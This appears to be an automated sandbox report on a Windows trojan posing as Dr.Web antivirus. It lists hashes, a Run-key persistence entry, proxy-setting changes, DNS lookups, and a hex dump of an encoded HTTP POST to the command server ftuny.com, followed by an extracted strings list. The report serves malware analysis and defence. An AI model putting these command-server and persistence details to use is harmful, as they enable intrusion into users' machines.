Analysis Date2014-08-22 11:00:30
MD5671351d8f639eb6db162865a82c348b5
SHA181affee09f80a80eb52a66d4b43cf046b565ef5c

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: f140fca0ff43cbe8cb67385f055e2a11 sha1: fed89bcac8c375d3cd668eebe230d0e3c30c8cb5 size: 9728
Section.rdata md5: e978418ff0e99dc88a25ebdecfd8a0dd sha1: a3eefbddd3900d05ae540a4770f1bef1ca1e5341 size: 5120
Section.data md5: aefe22c7f483d78e71a8b9132bce4d46 sha1: 21f157f73f6a294c9f0e9958271b7e9577ebbdf1 size: 118784
Section.rsrc md5: 9887738dd712e8d57529ed4ad83f5bfe sha1: 3ea10ce9985deb1b8cada71adfadd028aba8740d size: 2048
Timestamp2009-09-21 01:36:00
VersionLegalCopyright: Copyright (C) p DoctorWeb, Ltd., 1992-2011
InternalName: Dr.Web for Windows c2
FileVersion: 5.0.572.1152
CompanyName: ComponentOne LLC
LegalTrademarks:
Comments:
ProductName: Dr.Web for Windows
ProductVersion: 5.0.572.1152
FileDescription: QDrWeb For Windows 2011
OriginalFilename: zPE-Protectedi.exe
PEhashe45ce3c903bbbfa839592e6536abfe677377a6fb
IMPhash684a4b2eb4bf5695c3782650dba7322f

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\CE8SIIFGSU ➝
C:\malware.exe
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_CURRENT_USER\Software\CE8SIIFGSU\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
Creates FileC:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNSftuny.com

Process
↳ C:\malware.exe

Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Network Details:

DNSdailymotion.com
Type: A
195.8.215.137
DNSdailymotion.com
Type: A
195.8.215.138
DNSdailymotion.com
Type: A
195.8.215.139
DNSdailymotion.com
Type: A
195.8.215.136
DNSnetflix.com
Type: A
69.53.236.17
DNSftuny.com
Type: A
208.73.211.193
DNSftuny.com
Type: A
208.73.211.242
DNSftuny.com
Type: A
208.73.211.163
DNSftuny.com
Type: A
208.73.211.174
DNSftuny.com
Type: A
208.73.211.175
DNSphreeway.com
Type: A
HTTP POSThttp://ftuny.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 208.73.211.193:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   6674756e 792e636f 6d0d0a43 6f6e7465   ftuny.com..Conte
0x000000b0 (00176)   6e742d4c 656e6774 683a2033 34310d0a   nt-Length: 341..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 43616368 652d436f   -Alive..Cache-Co
0x000000e0 (00224)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000f0 (00240)   0a0d0a64 6174613d 2f436a45 665a4453   ...data=/CjEfZDS
0x00000100 (00256)   76787143 694b306c 74554d31 7579322f   vxqCiK0ltUM1uy2/
0x00000110 (00272)   79753455 3559704e 6d31762f 2f6a546e   yu4U5YpNm1v//jTn
0x00000120 (00288)   6756632b 774d732b 2b5a426a 375a5359   gVc+wMs++ZBj7ZSY
0x00000130 (00304)   54723369 426b472f 672b3756 43432f30   Tr3iBkG/g+7VCC/0
0x00000140 (00320)   7045726a 4f487037 65526348 5069596f   pErjOHp7eRcHPiYo
0x00000150 (00336)   39394d4d 55756a67 55573462 76544964   99MMUujgUW4bvTId
0x00000160 (00352)   4e2f6a50 58754750 6a61427a 786c6363   N/jPXuGPjaBzxlcc
0x00000170 (00368)   356d704e 30316136 742f5169 53585877   5mpN01a6t/QiSXXw
0x00000180 (00384)   707a3948 6d306b7a 39664266 61556e31   pz9Hm0kz9fBfaUn1
0x00000190 (00400)   30782f47 4c636f66 52694834 4c764673   0x/GLcofRiH4LvFs
0x000001a0 (00416)   41694759 46736169 6f4d5730 374b3045   AiGYFsaioMW07K0E
0x000001b0 (00432)   33726b6b 334d655a 55796744 654c4777   3rkk3MeZUygDeLGw
0x000001c0 (00448)   32733132 2b6f504d 4e726e4a 5a637a68   2s12+oPMNrnJZczh
0x000001d0 (00464)   7a5a3878 694e5775 3554674f 6871344f   zZ8xiNWu5TgOhq4O
0x000001e0 (00480)   71555330 424d5464 4b32625a 792f6878   qUS0BMTdK2bZy/hx
0x000001f0 (00496)   33546e6d 47795446 4c48684c 6352662b   3TnmGyTFLHhLcRf+
0x00000200 (00512)   76417a49 4f424e6d 76343343 444b3251   vAzIOBNmv43CDK2Q
0x00000210 (00528)   30354156 636d4138 324b6854 66557373   05AVcmA82KhTfUss
0x00000220 (00544)   2f476f6c 77786c6d 396b4c73 76325649   /Golwxlm9kLsv2VI
0x00000230 (00560)   36706f36 6e333664 2f33346b 6f6c5677   6po6n36d/34kolVw
0x00000240 (00576)   614b5168 2f513d3d                     aKQh/Q==


Strings
X.N.
.
....
..
.
..
/
.
041904E3
4YVo
5.0.572.1152
5nOp
ANSI
ASCII
BCD overflow
Big Endian Unicode
btUI
Comments
CompanyName
ComponentOne LLC
Copyright (C) p DoctorWeb, Ltd., 1992-2011
Dr.Web for Windows 
Dr.Web for Windows c2
eeje
FDqM
FileDescription
FileVersion
FMHr
GmyrL
InternalName
Invalid owner=This control requires version 4.70 or greater of COMCTL32.DLL
Invalid SQL date/time values
LegalCopyright
LegalTrademarks
LError loading dock zone from the stream. Expecting version %d, but found %d.#No OnGetItem event handler assigned
OriginalFilename
ProductName
ProductVersion
QDrWeb For Windows  2011
Remote Login
%s is not a valid BCD value$Could not parse SQL TimeStamp string
StringFileInfo
Translation
Unicode
UTF-7
UTF-8
VarFileInfo
VS_VERSION_INFO
zPE-Protectedi.exe
0}1Ywt
;0du6N]uh
1[<-<&5
192ZBr3O
196McO3yLmRWy@24
\1Oj;y^
2eYJqU
=	2}LPg=W
3bhC7u
3S"{w3
.3V]{D
-49]CY
4GMyT*
4K|VF 
^4sXGX
5^, 2b
=5B&n7?
5<"CdM
:5H37W
5wWUg4oE
7&9U<h
7ytsRc
)[7z95Lh
8kNeiwE
~8WR!^
8Z_MUU
9=#15;}
, 9jC1c
9YomvRj
aa2VEpc.MZ
ActivateKeyboardLayout
AdjustWindowRectEx
AHCpqY
aL!Rkn
}	aMdI
_AOAvw8bRowxc@20
AOLb,0
|#aowg
a]Sa]a 
aV]=Pd
Avz2p8Q
aw18I1V
[-BOCd/
C2<^+`A
CallNextHookEx
CallWindowProcA
CC07Jm
cDz{%`
cgjZzN
CharLowerA
CharLowerBuffA
CharNextA
CharUpperA
CharUpperBuffA
,c(Hf.
ChildWindowFromPoint
c	JF5t
C]KUE(s
ClientToScreen
CreateFontIndirectA
CreateIcon
CreateMenu
CreatePenIndirect
CreatePopupMenu
CWrL"|]
D4W#a3
d-55a:
$D}=A |
@.data
DefMDIChildProcA
DefWindowProcA
DeleteMenu
DestroyIcon
DestroyMenu
DestroyWindow
Dez3P?
DIDX37
DispatchMessageW
@dmReM|
D	oylQ
DrawAnimatedRects
DrawFrameControl
DrawMenuBar
DrawTextA
DXEK`A
-d@Y74=` =
\e2Xkl
E6SCI0
E#!a8S
EB3cCno
ec7&<T>
edz}u3
egM]	n'
EnableMenuItem
EnableScrollBar
EndPaint
EnumThreadWindows
EnumWindows
e?*<;Q
ET55]PS*
eWIM,k
ExitProcess
f7i1oR
FcAd0@Ps
$Fe)7Q
*f+iv)
FrameRect
fSl1WAj
Fsx99m7
#\'G71
gdi32.dll
GetBitmapBits
GetBkColor
GetBkMode
GetCapture
GetClassInfoA
GetClassLongA
GetClientRect
GetCursor
GetCursorPos
GetDCEx
GetDesktopWindow
GetDlgItem
GetFocus
GetKeyboardLayoutNameA
GetKeyboardType
GetKeyNameTextA
GetKeyState
GetLastActivePopup
GetMenu
GetMenuStringA
GetOEMCP
GetParent
GetProcAddress
GetScrollInfo
GetScrollRange
GetSubMenu
GetSysColorBrush
GetSystemMetrics
GetTextColor
GetWindow
GetWindowLongA
GetWindowLongW
GetWindowTextA
GetWindowThreadProcessId
g%\o5U
GP3UcLXH9
@gxY%w
G:Z[$I
H+F;h3
hgXsdZY
HKSEI 
!hM>,,
Hs?7zZ
"i\|63e%
if9=f_
iHaWKZ4h
Ij[]W>
InflateRect
InsertMenuA
InsertMenuItemA
IntersectRect
IsCharLowerA
IsChild
IsDialogMessageA
IsDialogMessageW
IsDlgButtonChecked
IsIconic
IsRectEmpty
Ist1F.
IsWindow
IsWindowEnabled
IsWindowUnicode
IsZoomed
J4U 17h
@J9ah~=
Ja#EaM
J,eO-sqXE
je\Yj{
_	j?i	~<
J{$L@N
j#p<]e
,J%r_^y
js$5Zm
#jyhpEB}+`Dh
;K+3M,
k;*DsG
)kEdyk.
KERNEL32.DLL
%K!!FC
kn13bTO
K(|vF 
k !	=y
l9KmTQ
LDf2s}{
LoadBitmapA
LoadCursorA
LoadLibraryA
LzhdifaK
LzU+_2-<
m03(ux
M3D`gqqn
M4.iByWeTo
MessageBeep
MessageBoxA
MoveWindow
mZZQkH
NbdnMJ
\.N!|N
?npgKx
nq5FwX
NV2K?2;
nXX 3_?%}
(NzePA 
OffsetRect
OpenClipboard
o]p&>MK
OqVMIFzNl
o&| Yh
PeekMessageA
Ph)G`R
P KVViA
PostMessageA
p]sUD$
PtInRect
$~PvjmX
QbIC=T}
q]DH2/
_Qer1NThrG2A1L@4
_QlffIq3DVbZ
@Qm6to
`.rdata
rDOfau
RDPx6x
RedrawWindow
RegisterClassA
RegisterClipboardFormatA
ReleaseCapture
ReleaseDC
RemovePropA
rO4OvS
R%	ryH-
ScrollWindow
sc*z][
SendMessageA
SendMessageW
SetClassLongA
SetClipboardData
SetCursor
SetForegroundWindow
SetPropA
SetRect
SetScrollInfo
SetScrollPos
SetScrollRange
SetWindowPlacement
SetWindowPos
SetWindowsHookExA
ShowOwnedPopups
ShowWindow
	;{<sJ
s$jhEa
s\mY}"
spc5 c
sr7M}D
sxMl%y
t0Y{},h2
t2PM{;T}
T9PFr5+	
T[BC5v
th%+^f
!This program cannot be run in DOS mode.
TrackPopupMenu
TranslateMDISysAccel
TranslateMessage
ts(}O3E
TtPnAu!su
Tvts1hIb
;tvW;r
twain_32
U,3<WY
U5`j,$Y
uau02S
_}}u F
U&Kj<f_P
UNIQSTR OG98
UnregisterClassA
UpdateWindow
user32.dll
UT>Gcq
vBEIP&D$X
&(Vf2E 
VirtualAlloc
VU;VLr
W^=EvT
WFzf44e8
WindowFromPoint
\W k&J
wsprintfA
'w?tAlp
~W&WVVvU|
WYXXL1C
?*X9}A{
xEEcke
?XJ3`Q
XKiOLx
xo6mCHo
[X}!rh[E
X@?;W3
y20H*R
Y9X(QI
Y/&j5aTW
^{.*YN)(P
z57dWcBpm@24
_ZBh45ah0_v
zMguIs
zPE-Protectedi.exe
Zu<5A`